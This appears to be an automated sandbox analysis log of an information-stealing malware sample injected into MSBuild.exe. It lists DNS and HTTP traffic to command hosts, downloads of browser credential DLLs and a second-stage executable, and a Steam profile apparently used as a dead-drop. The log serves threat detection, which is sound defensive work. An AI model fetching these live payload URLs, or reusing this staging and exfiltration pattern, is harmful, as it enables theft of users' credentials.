Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_00406963
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //sql.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //freebl3.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //mozglue.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //msvcp140.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //softokn3.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //vcruntime140.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //nss3.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: playd.healthnlife.pkCache-Control: no-cache
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: / https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: LRPC-e9c77b0923665da6f1a/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=f3480da2fdb3d1182bfb98f2; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34832Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 04 Oct 2024 07:52:44 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ]steamstatic.beearvagueo.sitebeearvagueo.site/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: a/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: proxy.johnmccrea.com
Source: global traffic DNS traffic detected: DNS query: playd.healthnlife.pk
Source: global traffic DNS traffic detected: DNS query: soldiefieop.site
Source: global traffic DNS traffic detected: DNS query: questionsmw.store
Source: global traffic DNS traffic detected: DNS query: abnomalrkmu.site
Source: global traffic DNS traffic detected: DNS query: chorusarorp.site
Source: global traffic DNS traffic detected: DNS query: treatynreit.site
Source: global traffic DNS traffic detected: DNS query: snarlypagowo.site
Source: global traffic DNS traffic detected: DNS query: mysterisop.site
Source: global traffic DNS traffic detected: DNS query: absorptioniw.site
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic DNS traffic detected: DNS query: beearvagueo.site
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: beearvagueo.site
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.GDAAKEBFIJDG
Source: MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto
Source: MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.
Source: MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.BFIJDG
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2478563220.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000016AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org/
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000016AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org/M
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2478563220.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.orgJDG
Source: file.exe, 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hoptoEBFIJDG
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://ocsp.entrust.net03
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001549000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2478563220.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exe
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exe1kkkktoken
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exeorm-data;
Source: file.exe, file.exe, 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2481607551.0000000001549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com/
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//freebl3.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//freebl3.dllnLF
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//mozglue.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//msvcp140.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//msvcp140.dll6L
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001565000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//nss3.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001565000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//nss3.dllp
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//softokn3.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//softokn3.dllNMf
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//sql.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//vcruntime140.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//vcruntime140.dll0
Source: file.exe, 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com/gfdsgrewgdsfadsahttps://steamcommunity.com/profiles/76561199780418869u55
Source: MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com/ontent-Disposition:
Source: MSBuild.exe, 00000009.00000002.2173304288.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
